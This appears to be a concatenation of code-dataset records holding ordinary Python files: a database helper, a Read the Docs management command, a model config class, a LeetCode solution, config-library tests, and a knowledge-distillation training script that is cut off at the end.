PyTypeChecker\n yield Episode(item['tvshow_name'], item['season'], item['number'],\n bool(item['hd']), item['link'])\n item = cursor.fetchone()\n\n def _state_episodes(self, state: EpisodeState):\n cursor = self.connection.cursor()\n cursor.execute('SELECT * FROM episode INNER JOIN ' + str(state) + ' '\n 'AS state '\n 'ON episode.tvshow_name = state.tvshow_name '\n 'AND episode.season = state.season '\n 'AND episode.number = state.number')\n return cursor\n\n def _all_episodes(self):\n cursor = self.connection.cursor()\n cursor.execute('SELECT * FROM episode')\n return cursor\n\n # TODO use generators to implement tvshows() and episodes()\n\n def episode_exists(self, episode) -> bool:\n cursor = self.connection.cursor()\n cursor.execute('SELECT * '\n 'FROM episode '\n 'WHERE tvshow_name = ? '\n 'AND season = ? 
'\n 'AND number = ?',\n (episode.tvshow_name, episode.season, episode.number))\n return cursor.fetchone() is not None\n\n def __del__(self):\n self.connection.close()\n","sub_path":"src/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":6854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"238573484","text":"import logging\n\nfrom django.core.management.base import BaseCommand\n\nfrom readthedocs.projects import tasks\n\nfrom readthedocs.projects.models import Project\n\nlog = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument('projects', nargs='+', type=str)\n\n def handle(self, *args, **options):\n projects = options['projects']\n if 'all' in projects:\n queryset = Project.objects.all()\n else:\n queryset = Project.objects.filter(slug__in=projects)\n for proj in queryset:\n tasks.symlink_project(project_pk=proj.pk)\n","sub_path":"readthedocs/core/management/commands/symlink.py","file_name":"symlink.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"623172396","text":"r\"\"\"This module provides package-wide configuration management.\"\"\"\nfrom typing import Any, List\n\nfrom yacs.config import CfgNode as CN\n\n\nclass Config(object):\n r\"\"\"\n A collection of all the required configuration parameters. This class is a nested dict-like\n structure, with nested keys accessible as attributes. It contains sensible default values for\n all the parameters, which may be overriden by (first) through a YAML file and (second) through\n a list of attributes and values.\n\n Extended Summary\n ----------------\n This class definition contains default values corresponding to ``joint_training`` phase, as it\n is the final training phase and uses almost all the configuration parameters. Modification of\n any parameter after instantiating this class is not possible, so you must override required\n parameter values in either through ``config_yaml`` file or ``config_override`` list.\n\n Parameters\n ----------\n config_yaml: str\n Path to a YAML file containing configuration parameters to override.\n config_override: List[Any], optional (default= [])\n A list of sequential attributes and values of parameters to override. This happens after\n overriding from YAML file.\n\n Examples\n --------\n Let a YAML file named \"config.yaml\" specify these parameters to override::\n\n ALPHA: 1000.0\n BETA: 0.5\n\n >>> _C = Config(\"config.yaml\", [\"OPTIM.BATCH_SIZE\", 2048, \"BETA\", 0.7])\n >>> _C.ALPHA # default: 100.0\n 1000.0\n >>> _C.BATCH_SIZE # default: 256\n 2048\n >>> _C.BETA # default: 0.1\n 0.7\n\n Attributes\n ----------\n RANDOM_SEED: 0\n Random seed for NumPy and PyTorch, important for reproducibility.\n\n PHASE: \"joint_training\"\n Which phase to train (or evaluate) on? One of ``program_prior``, ``question_coding``,\n ``module_training`` or ``joint_training``.\n\n SUPERVISION: 1000\n Number of training examples where questions have paired ground-truth programs. These\n examples are chosen randomly (no stochasticity for a fixe ``RANDOM_SEED``).\n\n SUPERVISION_QUESTION_MAX_LENGTH: 40\n Maximum length of questions to be considered for choosing ``SUPERVISION`` number of\n training examples. 
Longer questions will not have paired ground-truth programs by default.\n\n OBJECTIVE: \"ours\"\n Training objective, ``baseline`` - only use ``SUPERVISION`` examples for training.\n truth programs, and ``ours`` - use the whole dataset for training.\n __________\n\n DATA:\n Collection of required data paths for training and evaluation. All these are assumed to be\n relative to project root directory. If elsewhere, symlinking is recommended.\n\n DATA.VOCABULARY: \"clevr_vocabulary\"\n Path to a directory containing CLEVR v1.0 vocabulary (readable by AllenNLP).\n\n DATA.TRAIN_TOKENS: \"data/clevr_train_tokens.h5\"\n Path to H5 file containing tokenized programs, questions and answers, and corresponding\n image indices for CLEVR v1.0 train split.\n\n DATA.TRAIN_FEATURES: \"data/clevr_train_features.h5\"\n Path to H5 file containing pre-extracted features from CLEVR v1.0 train images.\n\n DATA.VAL_TOKENS: \"data/clevr_val_tokens.h5\"\n Path to H5 file containing tokenized programs, questions and answers, and corresponding\n image indices for CLEVR v1.0 val split.\n\n DATA.VAL_FEATURES: \"data/clevr_val_features.h5\"\n Path to H5 file containing pre-extracted features from CLEVR v1.0 val images.\n\n DATA.TEST_TOKENS: \"data/clevr_test_tokens.h5\"\n Path to H5 file containing tokenized questions, and corresponding image indices for CLEVR\n v1.0 test split.\n\n DATA.TEST_FEATURES: \"data/clevr_test_features.h5\"\n Path to H5 file containing pre-extracted features from CLEVR v1.0 test images.\n __________\n\n PROGRAM_PRIOR:\n Parameters controlling the model architecture of Program Prior (LSTM language model).\n\n PROGRAM_PRIOR.INPUT_SIZE: 256\n The dimension of the inputs to the LSTM.\n\n PROGRAM_PRIOR.HIDDEN_SIZE: 256\n The dimension of the outputs of the LSTM.\n\n PROGRAM_PRIOR.NUM_LAYERS: 2\n Number of recurrent layers in the LSTM.\n\n PROGRAM_PRIOR.DROPOUT: 0.0\n Dropout probability for the outputs of LSTM at each layer except last.\n __________\n\n PROGRAM_GENERATOR:\n Parameters controlling the model architecture of Program Generator (Seq2Seq model). Here,\n the model encodes questions and decodes programs.\n\n PROGRAM_GENERATOR.INPUT_SIZE: 256\n The dimension of the inputs to the encoder and decoder.\n\n PROGRAM_GENERATOR.HIDDEN_SIZE: 256\n The dimension of the outputs of the encoder and decoder.\n\n PROGRAM_GENERATOR.NUM_LAYERS: 2\n Number of recurrent layers in the LSTM.\n\n PROGRAM_GENERATOR.DROPOUT: 0.0\n Dropout probability for the outputs of LSTM at each layer except last.\n __________\n\n QUESTION_RECONSTRUCTOR:\n Parameters controlling the model architecture of Question Reconstructor (Seq2Seq model).\n Here, the model encodes programs and decodes questions.\n\n QUESTION_RECONSTRUCTOR.INPUT_SIZE: 256\n The dimension of the inputs to the encoder and decoder.\n\n QUESTION_RECONSTRUCTOR.HIDDEN_SIZE: 256\n The dimension of the outputs of the encoder and decoder.\n\n QUESTION_RECONSTRUCTOR.NUM_LAYERS: 2\n Number of recurrent layers in the LSTM.\n\n QUESTION_RECONSTRUCTOR.DROPOUT: 0.0\n Dropout probability for the outputs of LSTM at each layer except last.\n __________\n\n NMN:\n Parameters controlling the model architecture of Neural Module Network. 
Here, the model\n takes an image and a program, lays out a pipeline of neural modules and executes it to\n get an answer.\n\n NMN.IMAGE_FEATURE_SIZE: [1024, 14, 14]\n Shape of input image features, in the form (channel, height, width).\n\n NMN.MODULE_CHANNELS: 128\n Number of channels for each neural module's convolutional blocks.\n\n NMN.CLASS_PROJECTION_CHANNELS: 1024\n Number of channels in projected final feature map (input to classifier).\n\n NMN.CLASSIFIER_LINEAR_SIZE: 1024\n Size of input to the classifier.\n __________\n\n ALPHA: 100.0\n Supervision scaling co-efficient. The negative log-likelihood loss of program generation\n and question reconstruction for examples with (GT) program supervision is scaled by this\n factor. Used during question coding and joint training.\n\n BETA: 0.1\n KL co-efficient. KL-divergence in ELBO is scaled by this factor. Used during question\n coding and joint training.\n\n GAMMA: 1.0\n Answer log-likelihood scaling co-efficient during joint training.\n\n DELTA: 0.99\n Decay co-efficient for moving average REINFORCE baseline. Used during question coding and\n joint training.\n __________\n\n OPTIM:\n Optimization hyper-parameters, relevant during training a particular phase.\n\n OPTIM.BATCH_SIZE: 256\n Batch size during training and evaluation.\n\n OPTIM.NUM_ITERATIONS: 20000\n Number of iterations to train for, batches are randomly sampled.\n\n OPTIM.WEIGHT_DECAY: 0.0\n Weight decay co-efficient for the optimizer.\n\n OPTIM.LR_INITIAL: 0.00001\n Initial learning rate for :class:`torch.optim.lr_scheduler.ReduceLROnPlateau`.\n\n OPTIM.LR_GAMMA: 0.5\n Factor to scale learning rate when an observed metric plateaus.\n\n OPTIM.LR_PATIENCE: 3\n Number of validation steps to wait and observe improvement in observed metric, before\n reducing the learning rate.\n __________\n\n CHECKPOINTS:\n Paths to pre-trained checkpoints of a particular phase to be used in subsequent phases.\n\n CHECKPOINTS.PROGRAM_PRIOR: \"checkpoints/program_prior_best.pth\"\n Path to pre-trained Program Prior checkpoint. Used during question coding and joint\n training.\n\n CHECKPOINTS.QUESTION_CODING: \"checkpoints/question_coding_1000_baseline_best.pth\"\n Path to pre-trained question coding checkpoint containing Program Prior (unchanged from\n ``program_prior`` phase), Program generator and Question Reconstructor. Used during\n module training and joint training.\n\n CHECKPOINTS.MODULE_TRAINING: \"checkpoints/module_training_1000_baseline_best.pth\"\n Path to pre-trained question coding checkpoint containing Program Generator (unchanged\n from ``question_coding`` phase) and Neural Module Network. 
Used during joint training.\n \"\"\"\n\n def __init__(self, config_yaml: str, config_override: List[Any] = []):\n\n self._C = CN()\n self._C.RANDOM_SEED = 0\n\n self._C.PHASE = \"joint_training\"\n self._C.SUPERVISION = 1000\n self._C.SUPERVISION_QUESTION_MAX_LENGTH = 40\n self._C.OBJECTIVE = \"ours\"\n\n self._C.DATA = CN()\n self._C.DATA.VOCABULARY = \"data/clevr_vocabulary\"\n\n self._C.DATA.TRAIN = CN()\n self._C.DATA.TRAIN_TOKENS = \"data/clevr_train_tokens.h5\"\n self._C.DATA.TRAIN_FEATURES = \"data/clevr_train_features.h5\"\n\n self._C.DATA.VAL = CN()\n self._C.DATA.VAL_TOKENS = \"data/clevr_val_tokens.h5\"\n self._C.DATA.VAL_FEATURES = \"data/clevr_val_features.h5\"\n\n self._C.DATA.TEST = CN()\n self._C.DATA.TEST_TOKENS = \"data/clevr_test_tokens.h5\"\n self._C.DATA.TEST_FEATURES = \"data/clevr_test_features.h5\"\n\n self._C.PROGRAM_PRIOR = CN()\n self._C.PROGRAM_PRIOR.INPUT_SIZE = 256\n self._C.PROGRAM_PRIOR.HIDDEN_SIZE = 256\n self._C.PROGRAM_PRIOR.NUM_LAYERS = 2\n self._C.PROGRAM_PRIOR.DROPOUT = 0.0\n\n self._C.PROGRAM_GENERATOR = CN()\n self._C.PROGRAM_GENERATOR.INPUT_SIZE = 256\n self._C.PROGRAM_GENERATOR.HIDDEN_SIZE = 256\n self._C.PROGRAM_GENERATOR.NUM_LAYERS = 2\n self._C.PROGRAM_GENERATOR.DROPOUT = 0.0\n\n self._C.QUESTION_RECONSTRUCTOR = CN()\n self._C.QUESTION_RECONSTRUCTOR.INPUT_SIZE = 256\n self._C.QUESTION_RECONSTRUCTOR.HIDDEN_SIZE = 256\n self._C.QUESTION_RECONSTRUCTOR.NUM_LAYERS = 2\n self._C.QUESTION_RECONSTRUCTOR.DROPOUT = 0.0\n\n self._C.NMN = CN()\n self._C.NMN.IMAGE_FEATURE_SIZE = [1024, 14, 14]\n self._C.NMN.MODULE_CHANNELS = 128\n self._C.NMN.CLASS_PROJECTION_CHANNELS = 1024\n self._C.NMN.CLASSIFIER_LINEAR_SIZE = 1024\n\n self._C.ALPHA = 100.0\n self._C.BETA = 0.1\n self._C.GAMMA = 1.0\n self._C.DELTA = 0.99\n\n self._C.OPTIM = CN()\n self._C.OPTIM.BATCH_SIZE = 256\n self._C.OPTIM.NUM_ITERATIONS = 20000\n self._C.OPTIM.WEIGHT_DECAY = 0.0\n\n self._C.OPTIM.LR_INITIAL = 0.00001\n self._C.OPTIM.LR_GAMMA = 0.5\n self._C.OPTIM.LR_PATIENCE = 3\n\n self._C.CHECKPOINTS = CN()\n self._C.CHECKPOINTS.PROGRAM_PRIOR = \"checkpoints/program_prior_best.pth\"\n self._C.CHECKPOINTS.QUESTION_CODING = \"checkpoints/question_coding_1000_ours_best.pth\"\n self._C.CHECKPOINTS.MODULE_TRAINING = \"checkpoints/module_training_1000_ours_best.pth\"\n\n # Override parameter values from YAML file first, then from override list.\n self._C.merge_from_file(config_yaml)\n self._C.merge_from_list(config_override)\n\n # Make an instantiated object of this class immutable.\n self._C.freeze()\n\n def dump(self, file_path: str):\n r\"\"\"Save config at the specified file path.\n\n Parameters\n ----------\n file_path: str\n (YAML) path to save config at.\n \"\"\"\n self._C.dump(stream=open(file_path, \"w\"))\n\n def __getattr__(self, attr: str):\n return self._C.__getattr__(attr)\n\n def __str__(self):\n return _config_str(self)\n\n def __repr__(self):\n return self._C.__repr__()\n\n\ndef _config_str(config: Config) -> str:\n r\"\"\"\n Collect a subset of config in sensible order (not alphabetical) according to phase. 
Used by\n :func:`Config.__str__()`.\n\n Parameters\n ----------\n config: Config\n A :class:`Config` object which is to be printed.\n \"\"\"\n _C = config\n\n __C: CN = CN({\"PHASE\": _C.PHASE, \"RANDOM_SEED\": _C.RANDOM_SEED})\n common_string: str = str(__C) + \"\\n\"\n\n if _C.PHASE in {\"question_coding\", \"joint_training\"}:\n __C = CN() # type: ignore\n __C.OBJECTIVE = _C.OBJECTIVE\n __C.SUPERVISION = _C.SUPERVISION\n __C.SUPERVISION_QUESTION_MAX_LENGTH = _C.SUPERVISION_QUESTION_MAX_LENGTH\n common_string += str(__C) + \"\\n\"\n\n common_string += str(_C.DATA) + \"\\n\"\n\n if _C.PHASE in {\"program_prior\", \"question_coding\", \"joint_training\"}:\n common_string += str(CN({\"PROGRAM_PRIOR\": _C.PROGRAM_PRIOR})) + \"\\n\"\n\n if _C.PHASE in {\"question_coding\", \"module_training\", \"joint_training\"}:\n common_string += str(CN({\"PROGRAM_GENERATOR\": _C.PROGRAM_GENERATOR})) + \"\\n\"\n\n if _C.PHASE in {\"question_coding\", \"joint_training\"}:\n common_string += str(CN({\"QUESTION_RECONSTRUCTOR\": _C.QUESTION_RECONSTRUCTOR})) + \"\\n\"\n\n if _C.PHASE in {\"module_training\", \"joint_training\"}:\n common_string += str(CN({\"NMN\": _C.NMN})) + \"\\n\"\n\n if _C.PHASE in {\"question_coding\", \"joint_training\"}:\n __C = CN() # type: ignore\n __C.ALPHA = _C.ALPHA\n __C.BETA = _C.BETA\n __C.DELTA = _C.DELTA\n if _C.PHASE == \"joint_training\":\n __C.GAMMA = _C.GAMMA\n common_string += str(__C) + \"\\n\"\n\n common_string += str(CN({\"OPTIM\": _C.OPTIM})) + \"\\n\"\n\n if _C.PHASE == \"question_coding\":\n __C = CN()\n __C.CHECKPOINTS = CN({\"PROGRAM_PRIOR\": _C.CHECKPOINTS.PROGRAM_PRIOR})\n elif _C.PHASE == \"module_training\":\n __C = CN()\n __C.CHECKPOINTS = CN({\"QUESTION_CODING\": _C.CHECKPOINTS.QUESTION_CODING})\n elif _C.PHASE == \"joint_training\":\n __C = CN()\n __C.CHECKPOINTS = CN()\n __C.CHECKPOINTS.QUESTION_CODING = _C.CHECKPOINTS.QUESTION_CODING\n __C.CHECKPOINTS.MODULE_TRAINING = _C.CHECKPOINTS.MODULE_TRAINING\n else:\n __C = CN()\n\n common_string += str(__C) + \"\\n\"\n return common_string\n","sub_path":"probnmn/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":14107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"388820649","text":"################################################################\n# Author : yiorgosynkl (find me in Github: https://github.com/yiorgosynkl)\n# Date created : 20200507\n# Problem link : https://leetcode.com/problems/cousins-in-binary-tree/\n################################################################\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\nclass Solution:\n def isCousins(self, root: TreeNode, x: int, y: int) -> bool:\n x_list = []\n y_list = []\n queue = [(root, 0, None)] # (node, depth, father)\n while True:\n if not queue:\n break\n node, level, father = queue.pop(0)\n if node: # not null\n if node.val == x:\n x_list.append((level, father))\n if node.val == y:\n y_list.append((level, father))\n # print(node.val, level)\n queue.append((node.left, level+1, node))\n queue.append((node.right, level+1, node))\n for x_lev, x_fath in x_list:\n for y_lev, y_fath in y_list:\n if x_lev == y_lev and x_fath != y_fath:\n return True\n return False\n \n # assuming that x or y are found once, author: rock\n # def isCousins(self, root: TreeNode, x: int, y: int) -> bool:\n # q, depth, xDepth, yDepth = [root], 0, -1, -2\n # while q:\n # 
q2 = []\n # depth += 1\n # for node in q:\n # sameParent = 0\n # for child in (node.left, node.right):\n # if child:\n # q2.append(child)\n # if child.val == x:\n # xDepth = depth\n # sameParent += 1\n # elif child.val == y:\n # yDepth = depth\n # sameParent += 1\n # if sameParent == 2:\n # return False \n # q = q2 \n # return xDepth == yDepth\n","sub_path":"30_day_challenge_2020_May/993_cousins_in_binary_tree_day07.py","file_name":"993_cousins_in_binary_tree_day07.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"180394089","text":"\"\"\"Integration tests for the moment.\n\"\"\"\n\nfrom pyobjconfig import PydanticBaseModel, ConfigurableObject, ConfigurableSwitch\n\nimport argparse\nimport os\nimport pydantic\nimport pytest\nimport typing\n\ndef test_basic():\n class BaseObject(ConfigurableObject):\n class config(PydanticBaseModel):\n a: int = 8\n b: str = 'hello world'\n\n def run(self):\n print(f'a: {self.config.a}, b: {self.config.b}')\n\n ap = argparse.ArgumentParser(description=__doc__)\n BaseObject.argparse_setup(ap)\n\n args = ap.parse_args([]).__dict__\n obj = BaseObject.argparse_create(args)\n obj.run()\n\n assert obj.config.a == 8\n assert obj.config.b == 'hello world'\n\n args = ap.parse_args(['--a', '99']).__dict__\n obj = BaseObject.argparse_create(args)\n assert obj.config.a == 99\n\n args = ap.parse_args(['--b', 'yodel']).__dict__\n obj = BaseObject.argparse_create(args)\n assert obj.config.b == 'yodel'\n\n with pytest.raises(TypeError) as exc:\n args = ap.parse_args(['--a', 'yodel']).__dict__\n print(args)\n obj = BaseObject.argparse_create(args)\n\n\ndef test_enum():\n class A(ConfigurableObject):\n def get(self):\n return 'A'\n class B(ConfigurableObject):\n def get(self):\n return 'B'\n class Base(ConfigurableObject):\n child = ConfigurableSwitch({\n 'a': A,\n 'b': B,\n })\n\n with pytest.raises(ValueError) as exc:\n Base.argparse_create({})\n assert 'Must specify child' in str(exc.value)\n assert 'A' == Base.argparse_create({'child': 'a'}).child.get()\n assert 'B' == Base.argparse_create({'child': 'b'}).child.get()\n\n\ndef test_env():\n class Base(ConfigurableObject):\n class config(PydanticBaseModel):\n test: str = 'testing'\n old = os.environ\n try:\n os.environ = os.environ.copy()\n b = Base.argparse_create({}, env='BLEEP')\n assert b.config.test == 'testing'\n\n os.environ['BLEEP_TEST'] = 'yay!'\n\n b = Base.argparse_create({}, env='BLEEP')\n assert b.config.test == 'yay!'\n b = Base.argparse_create({}, env='BLEEP2')\n assert b.config.test == 'testing'\n finally:\n os.environ = old\n\n\ndef test_list():\n class A(ConfigurableObject):\n class config(PydanticBaseModel):\n thing: typing.List[int] = [1]\n\n ap = argparse.ArgumentParser(description=__doc__)\n A.argparse_setup(ap)\n\n args = A.argparse_create(ap.parse_args([]).__dict__)\n assert args.config.thing == [1]\n args = A.argparse_create(ap.parse_args(['--thing', '2', '--thing', '3']).__dict__)\n assert args.config.thing == [2, 3]\n\n","sub_path":"test/test_pyobjconfig.py","file_name":"test_pyobjconfig.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"411718798","text":"import os\nimport argparse\nfrom typing import Dict, Any\nimport copy\nimport logging\n\nimport yaml\n\nimport torch\nimport torch.nn as nn\nfrom torch.optim.lr_scheduler import MultiStepLR\nfrom torch.optim import Optimizer\nfrom torch.utils.data 
import DataLoader\nfrom torch.nn import Module, CrossEntropyLoss, ModuleDict\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom dataset import get_dataset\n# from models import get_model\nfrom optim import get_optimizer\n\nfrom models import get_model\nfrom distiller_zoo import get_loss_module, get_loss_forward\n\nfrom helper.util import str2bool, get_logger, preserve_memory, adjust_learning_rate_stage2\nfrom helper.util import make_deterministic\nfrom helper.util import AverageMeter, accuracy\nfrom helper.validate import validate_LTB, validate\n\nfrom LEARNTOBRANCH import LEARNTOBRANCH_Deep\n\n\ndef get_dataloader(cfg: Dict[str, Any]):\n # dataset\n dataset_cfg = cfg[\"dataset\"]\n train_dataset = get_dataset(split=\"train\", **dataset_cfg)\n val_dataset = get_dataset(split=\"val\", **dataset_cfg)\n num_classes = len(train_dataset.classes)\n\n train_loader = DataLoader(\n dataset=train_dataset,\n batch_size=cfg[\"training\"][\"batch_size\"],\n num_workers=cfg[\"training\"][\"num_workers\"],\n shuffle=True,\n pin_memory=True\n )\n val_loader = DataLoader(\n dataset=val_dataset,\n batch_size=cfg[\"validation\"][\"batch_size\"],\n num_workers=cfg[\"validation\"][\"num_workers\"],\n shuffle=False,\n pin_memory=True\n )\n\n return train_loader, val_loader, num_classes\n\n\ndef train_epoch(\n cfg: Dict[str, Any],\n epoch: int,\n train_loader: DataLoader,\n module_dict: ModuleDict,\n criterion_dict: ModuleDict,\n optimizer: Optimizer,\n tb_writer: SummaryWriter,\n device: torch.device\n):\n logger = logging.getLogger(\"train_epoch\")\n # logger.info(\"Start training one epoch...\")\n\n gamma = cfg[\"kd\"][\"loss_weights\"][\"classify_weight\"]\n alpha = cfg[\"kd\"][\"loss_weights\"][\"kd_weight\"]\n beta = cfg[\"kd\"][\"loss_weights\"][\"other_loss_weight\"]\n logger.info(\n \"Starting train one epoch with [gamma: %.5f, alpha: %.5f, beta: %.5f]...\",\n gamma, alpha, beta\n )\n\n for name, module in module_dict.items():\n if name == \"teacher\":\n module.eval()\n else:\n module.train()\n\n criterion_cls = criterion_dict[\"cls\"]\n criterion_div = criterion_dict[\"div\"]\n criterion_kd = criterion_dict[\"kd\"]\n\n model_s = module_dict[\"student\"]\n model_t = module_dict[\"teacher\"]\n\n # if loss_method == 'nce':\n if cfg[\"model\"][\"task\"] == 'mt':\n losses = [AverageMeter() for _ in range(cfg[\"dataset\"][\"num_classes\"])]\n top1 = [AverageMeter() for _ in range(cfg[\"dataset\"][\"num_classes\"])]\n top5 = [AverageMeter() for _ in range(cfg[\"dataset\"][\"num_classes\"])]\n\n # elif loss_method =='ce':\n elif cfg[\"model\"][\"task\"] == 'mc':\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n for idx, (x, target) in enumerate(train_loader):\n __global_values__[\"it\"] += 1\n\n x = x.to(device)\n target = target.to(device)\n\n # ===================forward=====================\n # logger.info(x.shape)\n preact = False\n if cfg[\"kd_loss\"][\"name\"] == \"ABLoss\":\n preact = True\n\n # logit = model(x, int(cfg[\"training\"][\"t\"])/(epoch), False)\n\n logit_s = model_s(x, int(cfg[\"training\"][\"t\"])/(epoch), False)\n\n with torch.no_grad():\n logit_t = model_t(x, is_feat=False, preact=preact)\n \n feat_s = None\n feat_t = None \n\n if cfg[\"model\"][\"task\"] == 'mc':\n # print(logit.shape, target.shape)\n # return 0\n # cls + kl div\n loss_cls = criterion_cls(logit_s, target.squeeze())\n loss_div = criterion_div(logit_s, logit_t)\n\n loss_kd = get_loss_forward(\n cfg=cfg,\n feat_s=feat_s,\n feat_t=feat_t,\n logit_s=logit_s,\n logit_t=logit_t,\n 
target=target,\n criterion_kd=criterion_kd,\n module_dict=module_dict\n )\n\n loss = gamma * loss_cls + alpha * loss_div + beta * loss_kd\n acc1, acc5 = accuracy(logit_s, target.squeeze(), topk=(1, 5))\n losses.update(loss.item(), x.shape[0])\n top1.update(acc1[0], x.shape[0])\n top5.update(acc5[0], x.shape[0])\n\n # loss = criterion(logit, target.squeeze())\n # acc1, acc5 = accuracy(logit, target.squeeze(), topk=(1, 5))\n # losses.update(loss.item(), x.shape[0])\n # top1.update(acc1[0], x.shape[0])\n # top5.update(acc5[0], x.shape[0])\n loss_avg = losses.avg\n top1_avg = top1.avg\n top5_avg = top5.avg\n # elif loss_method == 'nce':\n elif cfg[\"model\"][\"task\"] == 'mt':\n\n loss = []\n acc1, acc5 = [], []\n print(len(logit), logit[0].shape, logit[1].shape)\n print(target.shape)\n return 0\n for j in range(len(logit)):\n print(logit[j].shape)\n print(logit)\n\n return 0\n\n loss.append(criterion(logit[j], target[:, j]))\n acc1.append(accuracy(logit[j], target[:, j], topk=(1, 1))[0])\n acc5.append(accuracy(logit[j], target[:, j], topk=(1, 1))[1])\n\n losses[j].update(loss[j].item(), x.shape[0])\n top1[j].update(acc1[j], x.shape[0])\n top5[j].update(acc5[j], x.shape[0])\n\n losses_avg = [losses[k].avg for k in range(len(losses))]\n top1_avg = [top1[k].avg for k in range(len(top1))]\n top5_avg = [top5[k].avg for k in range(len(top5))]\n\n loss_avg = sum(losses_avg) / len(losses_avg)\n top1_avg = sum(top1_avg) / len(top1_avg)\n top5_avg = sum(top5_avg) / len(top5_avg)\n\n loss = sum(loss)\n # ===================backward=====================\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # print info\n tb_writer.add_scalars(\n main_tag=\"train/acc\",\n tag_scalar_dict={\n \"@1\": top1_avg,\n \"@5\": top5_avg,\n },\n global_step=__global_values__[\"it\"]\n )\n tb_writer.add_scalars(\n main_tag=\"train/loss\",\n tag_scalar_dict={\n \"cls\": loss_cls.item(),\n \"div\": loss_div.item(),\n \"kd\": loss_kd.item()\n },\n global_step=__global_values__[\"it\"]\n )\n if idx % cfg[\"training\"][\"print_iter_freq\"] == 0:\n logger.info(\n \"Epoch: %3d|%3d, idx: %d, total iter: %d, loss: %.5f, acc@1: %.4f, acc@5: %.4f\",\n epoch, cfg[\"training\"][\"epochs\"],\n idx, __global_values__[\"it\"],\n loss_avg, top1_avg, top5_avg\n )\n\n # return top1.avg, losses.avg\n return top1_avg, loss_avg\n\n\ndef train_kd(\n cfg: Dict[str, Any],\n train_loader: DataLoader,\n val_loader: DataLoader,\n module_dict: ModuleDict,\n criterion_dict: ModuleDict,\n optimizer: Optimizer,\n lr_scheduler: MultiStepLR,\n tb_writer: SummaryWriter,\n device: torch.device,\n ckpt_dir: str\n):\n logger = logging.getLogger(\"train\")\n logger.info(\"Start training...\")\n\n # validate teacher accuracy\n teacher_acc, _, _ = validate(\n val_loader=val_loader,\n model=module_dict[\"teacher\"],\n criterion=criterion_dict[\"cls\"],\n device=device\n )\n logger.info(\"Teacher accuracy: %.4f\", teacher_acc)\n\n best_acc = 0\n for epoch in range(1, cfg[\"training\"][\"epochs\"] + 1):\n global_lr = adjust_learning_rate_stage2(\n optimizer=optimizer,\n epoch_current=epoch\n )\n\n logger.info(\"Start training epoch: %d, current lr: %.6f\", \n epoch, lr_scheduler.get_last_lr()[0])\n\n train_acc, train_loss = train_epoch(\n cfg=cfg,\n epoch=epoch,\n train_loader=train_loader,\n module_dict=module_dict,\n criterion_dict=criterion_dict,\n optimizer=optimizer,\n tb_writer=tb_writer,\n device=device\n )\n\n tb_writer.add_scalar(\"epoch/train_acc\", train_acc, epoch)\n tb_writer.add_scalar(\"epoch/train_loss\", train_loss, epoch)\n\n 
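# --- Editorial aside (not part of this record): a minimal, self-contained sketch of the three-term objective computed in train_epoch() above, i.e. loss = gamma * loss_cls + alpha * loss_div + beta * loss_kd. The record never shows how criterion_div is constructed, so the DistillKL class and its temperature T below are assumptions, not the repo's actual code.

import torch
import torch.nn as nn
import torch.nn.functional as F

class DistillKL(nn.Module):
    """KL divergence between temperature-softened student and teacher logits (assumed form of criterion_div)."""
    def __init__(self, T: float = 4.0):
        super().__init__()
        self.T = T  # temperature is an illustrative assumption

    def forward(self, logit_s: torch.Tensor, logit_t: torch.Tensor) -> torch.Tensor:
        p_s = F.log_softmax(logit_s / self.T, dim=1)
        p_t = F.softmax(logit_t / self.T, dim=1)
        # multiply by T^2 so gradient magnitudes stay comparable across temperatures
        return F.kl_div(p_s, p_t, reduction="batchmean") * (self.T ** 2)

# usage sketch, mirroring the weighted sum above:
# loss = gamma * F.cross_entropy(logit_s, y) + alpha * DistillKL()(logit_s, logit_t.detach()) + beta * loss_kd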
val_acc, val_acc_top5, val_loss = validate_LTB(\n cfg=cfg,\n val_loader=val_loader,\n model=module_dict[\"student\"],\n criterion=criterion_dict[\"cls\"],\n device=device,\n num_classes=cfg[\"dataset\"][\"num_classes\"],\n t=cfg[\"training\"][\"t\"],\n epoch=epoch,\n loss_method=cfg[\"model\"][\"loss_method\"],\n stage='s2'\n )\n\n tb_writer.add_scalar(\"epoch/val_acc\", val_acc, epoch)\n tb_writer.add_scalar(\"epoch/val_loss\", val_loss, epoch)\n tb_writer.add_scalar(\"epoch/val_acc_top5\", val_acc_top5, epoch)\n\n logger.info(\n \"Epoch: %04d | %04d, acc: %.4f, loss: %.5f, val_acc: %.4f, val_acc_top5: %.4f, val_loss: %.5f\",\n epoch, cfg[\"training\"][\"epochs\"],\n train_acc, train_loss,\n val_acc, val_acc_top5, val_loss\n )\n\n lr_scheduler.step()\n\n state = {\n \"epoch\": epoch,\n \"model\": module_dict[\"student\"].state_dict(),\n \"acc\": val_acc,\n \"optimizer\": optimizer.state_dict(),\n \"lr_scheduler\": lr_scheduler.state_dict()\n }\n\n # regular saving\n if epoch % cfg[\"training\"][\"save_ep_freq\"] == 0:\n print(epoch, cfg[\"training\"][\"save_ep_freq\"])\n logger.info(\"Saving epoch %d checkpoint...\", epoch)\n\n save_file = os.path.join(ckpt_dir, \"epoch_{}.pth\".format(epoch))\n torch.save(state, save_file)\n\n # save the best model\n if val_acc > best_acc:\n best_acc = val_acc\n best_ep = epoch\n\n save_file = os.path.join(ckpt_dir, \"best.pth\")\n logger.info(\"Saving the best model with acc: %.4f\", best_acc)\n torch.save(state, save_file)\n logger.info(\"Epoch: %04d | %04d, best acc: %.4f,\", epoch, 